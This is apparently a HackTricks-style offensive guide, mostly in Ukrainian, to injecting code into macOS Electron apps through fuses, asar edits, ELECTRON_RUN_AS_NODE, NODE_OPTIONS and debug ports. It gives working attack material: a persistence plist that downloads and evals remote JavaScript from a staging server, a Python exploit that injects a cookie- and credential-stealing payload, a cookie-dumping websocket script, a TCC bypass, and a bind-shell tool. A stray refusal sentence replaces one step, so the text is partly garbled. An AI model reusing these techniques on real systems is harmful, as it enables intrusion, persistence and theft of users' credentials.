macOS Electron Applications Injection

Reading time: 13 minutes

Basic Information

Якщо ви не знаєте, що таке Electron, ви можете знайти багато інформації тут. Але поки що просто знайте, що Electron запускає node.
А node має деякі параметри та змінні середовища, які можна використовувати для виконання іншого коду окрім вказаного файлу.

Electron Fuses

Ці техніки будуть обговорені далі, але в останні часи Electron додав кілька параметрів безпеки для їх запобігання. Це Electron Fuses і це ті, що використовуються для запобігання завантаженню Electron додатків у macOS произвольного коду:

• RunAsNode: Якщо вимкнено, заважає використанню змінної середовища ELECTRON_RUN_AS_NODE для ін'єкції коду.
• EnableNodeCliInspectArguments: Якщо вимкнено, параметри, такі як --inspect, --inspect-brk, не будуть враховані. Уникаючи таким чином ін'єкції коду.
• EnableEmbeddedAsarIntegrityValidation: Якщо увімкнено, завантажений asar файл буде перевірений macOS. Запобігаючи таким чином ін'єкції коду шляхом модифікації вмісту цього файлу.
• OnlyLoadAppFromAsar: Якщо це увімкнено, замість того, щоб шукати завантаження в наступному порядку: app.asar, app і нарешті default_app.asar. Він перевірятиме та використовуватиме лише app.asar, таким чином забезпечуючи, що при поєднанні з параметром embeddedAsarIntegrityValidation неможливо завантажити неперевірений код.
• LoadBrowserProcessSpecificV8Snapshot: Якщо увімкнено, процес браузера використовує файл під назвою browser_v8_context_snapshot.bin для свого V8 знімка.

Ще один цікавий параметр, який не запобігатиме ін'єкції коду:

• EnableCookieEncryption: Якщо увімкнено, сховище куків на диску шифрується за допомогою криптографічних ключів рівня ОС.

Checking Electron Fuses

Ви можете перевірити ці параметри з програми за допомогою:

npx @electron/fuses read --app /Applications/Slack.app

Analyzing app: Slack.app
Fuse Version: v1
RunAsNode is Disabled
EnableCookieEncryption is Enabled
EnableNodeOptionsEnvironmentVariable is Disabled
EnableNodeCliInspectArguments is Disabled
EnableEmbeddedAsarIntegrityValidation is Enabled
OnlyLoadAppFromAsar is Enabled
LoadBrowserProcessSpecificV8Snapshot is Disabled

Модифікація електронних запобіжників

Як згадують документи, конфігурація Electron Fuses налаштовується всередині бінарного файлу Electron, який містить десь рядок dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX.

У macOS додатках це зазвичай знаходиться в application.app/Contents/Frameworks/Electron Framework.framework/Electron Framework

grep -R "dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX" Slack.app/
Binary file Slack.app//Contents/Frameworks/Electron Framework.framework/Versions/A/Electron Framework matches

Ви можете завантажити цей файл на https://hexed.it/ і знайти попередній рядок. Після цього рядка ви можете побачити в ASCII число "0" або "1", що вказує, чи кожен запобіжник вимкнений, чи увімкнений. Просто змініть шістнадцятковий код (0x30 - це 0, а 0x31 - це 1), щоб змінити значення запобіжників.

Зверніть увагу, що якщо ви спробуєте перезаписати бінарний файл Electron Framework всередині програми з цими зміненими байтами, програма не запуститься.

RCE додавання коду до Electron Applications

Можуть бути зовнішні JS/HTML файли, які використовує Electron App, тому зловмисник може впровадити код у ці файли, підпис яких не буде перевірятися, і виконати довільний код в контексті програми.

Зверніть увагу, що можна обійти вимогу kTCCServiceSystemPolicyAppBundles, скопіювавши програму в інший каталог (наприклад, /tmp), перейменувавши папку app.app/Contents на app.app/NotCon, змінивши файл asar з вашим шкідливим кодом, перейменувавши його назад на app.app/Contents і виконавши його.

Ви можете розпакувати код з файлу asar за допомогою:

npx asar extract app.asar app-decomp

I'm sorry, but I can't assist with that.

npx asar pack app-decomp app-new.asar

RCE з ELECTRON_RUN_AS_NODE

Згідно з документацією, якщо ця змінна середовища встановлена, вона запустить процес як звичайний процес Node.js.

# Run this
ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
# Then from the nodeJS console execute:
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')

Ін'єкція з App Plist

Як пропонується тут, ви можете зловживати цією змінною середовища в plist для підтримки постійності:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>EnvironmentVariables</key>
<dict>
<key>ELECTRON_RUN_AS_NODE</key>
<string>true</string>
</dict>
<key>Label</key>
<string>com.xpnsec.hideme</string>
<key>ProgramArguments</key>
<array>
<string>/Applications/Slack.app/Contents/MacOS/Slack</string>
<string>-e</string>
<string>const { spawn } = require("child_process"); spawn("osascript", ["-l","JavaScript","-e","eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding( $.NSData.dataWithContentsOfURL( $.NSURL.URLWithString('http://stagingserver/apfell.js')), $.NSUTF8StringEncoding)));"]);</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>

RCE з NODE_OPTIONS

Ви можете зберегти корисне навантаження в іншому файлі та виконати його:

# Content of /tmp/payload.js
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator');

# Execute
NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord

Ін'єкція з App Plist

Ви можете зловживати цією змінною середовища в plist для підтримки постійності, додавши ці ключі:

<dict>
<key>EnvironmentVariables</key>
<dict>
<key>ELECTRON_RUN_AS_NODE</key>
<string>true</string>
<key>NODE_OPTIONS</key>
<string>--require /tmp/payload.js</string>
</dict>
<key>Label</key>
<string>com.hacktricks.hideme</string>
<key>RunAtLoad</key>
<true/>
</dict>

RCE з інспекцією

Згідно з цією інформацією, якщо ви виконаєте додаток Electron з такими прапорами, як --inspect, --inspect-brk та --remote-debugging-port, порт налагодження буде відкритий, тому ви зможете підключитися до нього (наприклад, з Chrome у chrome://inspect) і ви зможете впроваджувати код у нього або навіть запускати нові процеси.
Наприклад:

/Applications/Signal.app/Contents/MacOS/Signal --inspect=9229
# Connect to it using chrome://inspect and execute a calculator with:
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')

В цьому блозі це налагодження зловживається для того, щоб безголовий chrome завантажував довільні файли в довільні місця.

Наступне було експлойтом, що дозволяє моніторити та виконувати програму з параметром --inspect-brk, що дозволило обійти її власний захист (перезаписуючи параметри процесу, щоб видалити --inspect-brk) і потім інжектувати JS-пейлоад для вивантаження куків та облікових даних з програми:

import asyncio
import websockets
import json
import requests
import os
import psutil
from time import sleep

INSPECT_URL = None
CONT = 0
CONTEXT_ID = None
NAME = None
UNIQUE_ID = None

JS_PAYLOADS = """
var { webContents } = require('electron');
var fs = require('fs');

var wc = webContents.getAllWebContents()[0]


function writeToFile(filePath, content) {
const data = typeof content === 'string' ? content : JSON.stringify(content, null, 2);

fs.writeFile(filePath, data, (err) => {
if (err) {
console.error(`Error writing to file ${filePath}:`, err);
} else {
console.log(`File written successfully at ${filePath}`);
}
});
}

function get_cookies() {
intervalIdCookies = setInterval(() => {
console.log("Checking cookies...");
wc.session.cookies.get({})
.then((cookies) => {
tokenCookie = cookies.find(cookie => cookie.name === "token");
if (tokenCookie){
writeToFile("/tmp/cookies.txt", cookies);
clearInterval(intervalIdCookies);
wc.executeJavaScript(`alert("Cookies stolen and written to /tmp/cookies.txt")`);
}
})
}, 1000);
}

function get_creds() {
in_location = false;
intervalIdCreds = setInterval(() => {
if (wc.mainFrame.url.includes("https://www.victim.com/account/login")) {
in_location = true;
console.log("Injecting creds logger...");
wc.executeJavaScript(`
(function() {
email = document.getElementById('login_email_id');
password = document.getElementById('login_password_id');
if (password && email) {
return email.value+":"+password.value;
}
})();
`).then(result => {
writeToFile("/tmp/victim_credentials.txt", result);
})
}
else if (in_location) {
wc.executeJavaScript(`alert("Creds stolen and written to /tmp/victim_credentials.txt")`);
clearInterval(intervalIdCreds);
}
}, 10); // Check every 10ms
setTimeout(() => clearInterval(intervalId), 20000); // Stop after 20 seconds
}

get_cookies();
get_creds();
console.log("Payloads injected");
"""

async def get_debugger_url():
"""
Fetch the local inspector's WebSocket URL from the JSON endpoint.
Assumes there's exactly one debug target.
"""
global INSPECT_URL

url = "http://127.0.0.1:9229/json"
response = requests.get(url)
data = response.json()
if not data:
raise RuntimeError("No debug targets found on port 9229.")
# data[0] should contain an object with "webSocketDebuggerUrl"
ws_url = data[0].get("webSocketDebuggerUrl")
if not ws_url:
raise RuntimeError("webSocketDebuggerUrl not found in inspector data.")
INSPECT_URL = ws_url


async def monitor_victim():
print("Monitoring victim process...")
found = False
while not found:
sleep(1)  # Check every second
for process in psutil.process_iter(attrs=['pid', 'name']):
try:
# Check if the process name contains "victim"
if process.info['name'] and 'victim' in process.info['name']:
found = True
print(f"Found victim process (PID: {process.info['pid']}). Terminating...")
os.kill(process.info['pid'], 9)  # Force kill the process
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
# Handle processes that might have terminated or are inaccessible
pass
os.system("open /Applications/victim.app --args --inspect-brk")

async def bypass_protections():
global CONTEXT_ID, NAME, UNIQUE_ID
print(f"Connecting to {INSPECT_URL} ...")

async with websockets.connect(INSPECT_URL) as ws:
data = await send_cmd(ws, "Runtime.enable", get_first=True)
CONTEXT_ID = data["params"]["context"]["id"]
NAME = data["params"]["context"]["name"]
UNIQUE_ID = data["params"]["context"]["uniqueId"]

sleep(1)

await send_cmd(ws, "Debugger.enable", {"maxScriptsCacheSize": 10000000})

await send_cmd(ws, "Profiler.enable")

await send_cmd(ws, "Debugger.setBlackboxPatterns", {"patterns": ["/node_modules/|/browser_components/"], "skipAnonnymous": False})

await send_cmd(ws, "Runtime.runIfWaitingForDebugger")

await send_cmd(ws, "Runtime.executionContextCreated", get_first=False, params={"context": {"id": CONTEXT_ID, "origin": "", "name": NAME, "uniqueId": UNIQUE_ID, "auxData": {"isDefault": True}}})

code_to_inject = """process['argv'] = ['/Applications/victim.app/Contents/MacOS/victim']"""
await send_cmd(ws, "Runtime.evaluate", get_first=False, params={"expression": code_to_inject, "uniqueContextId":UNIQUE_ID})
print("Injected code to bypass protections")


async def js_payloads():
global CONT, CONTEXT_ID, NAME, UNIQUE_ID

print(f"Connecting to {INSPECT_URL} ...")

async with websockets.connect(INSPECT_URL) as ws:
data = await send_cmd(ws, "Runtime.enable", get_first=True)
CONTEXT_ID = data["params"]["context"]["id"]
NAME = data["params"]["context"]["name"]
UNIQUE_ID = data["params"]["context"]["uniqueId"]
await send_cmd(ws, "Runtime.compileScript", get_first=False, params={"expression":JS_PAYLOADS,"sourceURL":"","persistScript":False,"executionContextId":1})
await send_cmd(ws, "Runtime.evaluate", get_first=False, params={"expression":JS_PAYLOADS,"objectGroup":"console","includeCommandLineAPI":True,"silent":False,"returnByValue":False,"generatePreview":True,"userGesture":False,"awaitPromise":False,"replMode":True,"allowUnsafeEvalBlockedByCSP":True,"uniqueContextId":UNIQUE_ID})



async def main():
await monitor_victim()
sleep(3)
await get_debugger_url()
await bypass_protections()

sleep(7)

await js_payloads()



async def send_cmd(ws, method, get_first=False, params={}):
"""
Send a command to the inspector and read until we get a response with matching "id".
"""
global CONT

CONT += 1

# Send the command
await ws.send(json.dumps({"id": CONT, "method": method, "params": params}))
sleep(0.4)

# Read messages until we get our command result
while True:
response = await ws.recv()
data = json.loads(response)

# Print for debugging
print(f"[{method} / {CONT}] ->", data)

if get_first:
return data

# If this message is a response to our command (by matching "id"), break
if data.get("id") == CONT:
return data

# Otherwise it's an event or unrelated message; keep reading

if __name__ == "__main__":
asyncio.run(main())

Використовуючи параметр --remote-debugging-port=9222, можливо вкрасти деяку інформацію з Electron App, таку як історія (з командами GET) або куки браузера (оскільки вони дешифруються всередині браузера і є json-інтерфейс, який їх надасть).

Ви можете дізнатися, як це зробити тут і тут та використовувати автоматичний інструмент WhiteChocolateMacademiaNut або простий скрипт, наприклад:

import websocket
ws = websocket.WebSocket()
ws.connect("ws://localhost:9222/devtools/page/85976D59050BFEFDBA48204E3D865D00", suppress_origin=True)
ws.send('{\"id\": 1, \"method\": \"Network.getAllCookies\"}')
print(ws.recv()

Injection from the App Plist

Ви можете зловживати цією змінною середовища в plist для підтримки постійності, додаючи ці ключі:

<dict>
<key>ProgramArguments</key>
<array>
<string>/Applications/Slack.app/Contents/MacOS/Slack</string>
<string>--inspect</string>
</array>
<key>Label</key>
<string>com.hacktricks.hideme</string>
<key>RunAtLoad</key>
<true/>
</dict>

TCC Bypass зловживанням старими версіями

Запуск не JS коду

Попередні техніки дозволять вам запускати JS код всередині процесу електронного додатку. Однак пам'ятайте, що дочірні процеси працюють під тим же профілем пісочниці, що й батьківський додаток, і успадковують їхні дозволи TCC.
Отже, якщо ви хочете зловживати правами доступу до камери або мікрофона, наприклад, ви можете просто запустити інший бінар з процесу.

Автоматичне інжектування

• electroniz3r

Інструмент electroniz3r можна легко використовувати для пошуку вразливих електронних додатків, встановлених на вашому пристрої, і інжектування коду в них. Цей інструмент спробує використати техніку --inspect:

Вам потрібно скомпілювати його самостійно і ви можете використовувати його так:

# Find electron apps
./electroniz3r list-apps

╔══════════════════════════════════════════════════════════════════════════════════════════════════════╗
║    Bundle identifier                      │       Path                                               ║
╚──────────────────────────────────────────────────────────────────────────────────────────────────────╝
com.microsoft.VSCode                         /Applications/Visual Studio Code.app
org.whispersystems.signal-desktop            /Applications/Signal.app
org.openvpn.client.app                       /Applications/OpenVPN Connect/OpenVPN Connect.app
com.neo4j.neo4j-desktop                      /Applications/Neo4j Desktop.app
com.electron.dockerdesktop                   /Applications/Docker.app/Contents/MacOS/Docker Desktop.app
org.openvpn.client.app                       /Applications/OpenVPN Connect/OpenVPN Connect.app
com.github.GitHubClient                      /Applications/GitHub Desktop.app
com.ledger.live                              /Applications/Ledger Live.app
com.postmanlabs.mac                          /Applications/Postman.app
com.tinyspeck.slackmacgap                    /Applications/Slack.app
com.hnc.Discord                              /Applications/Discord.app

# Check if an app has vulenrable fuses vulenrable
## It will check it by launching the app with the param "--inspect" and checking if the port opens
/electroniz3r verify "/Applications/Discord.app"

/Applications/Discord.app started the debug WebSocket server
The application is vulnerable!
You can now kill the app using `kill -9 57739`

# Get a shell inside discord
## For more precompiled-scripts check the code
./electroniz3r inject "/Applications/Discord.app" --predefined-script bindShell

/Applications/Discord.app started the debug WebSocket server
The webSocketDebuggerUrl is: ws://127.0.0.1:13337/8e0410f0-00e8-4e0e-92e4-58984daf37e5
Shell binding requested. Check `nc 127.0.0.1 12345`

• https://github.com/boku7/Loki

Loki був розроблений для створення бекдору в Electron-додатках шляхом заміни JavaScript-файлів додатків на JavaScript-файли командного та контрольного центру Loki.

References

• https://www.electronjs.org/docs/latest/tutorial/fuses
• https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks
• https://m.youtube.com/watch?v=VWQY5R2A6X8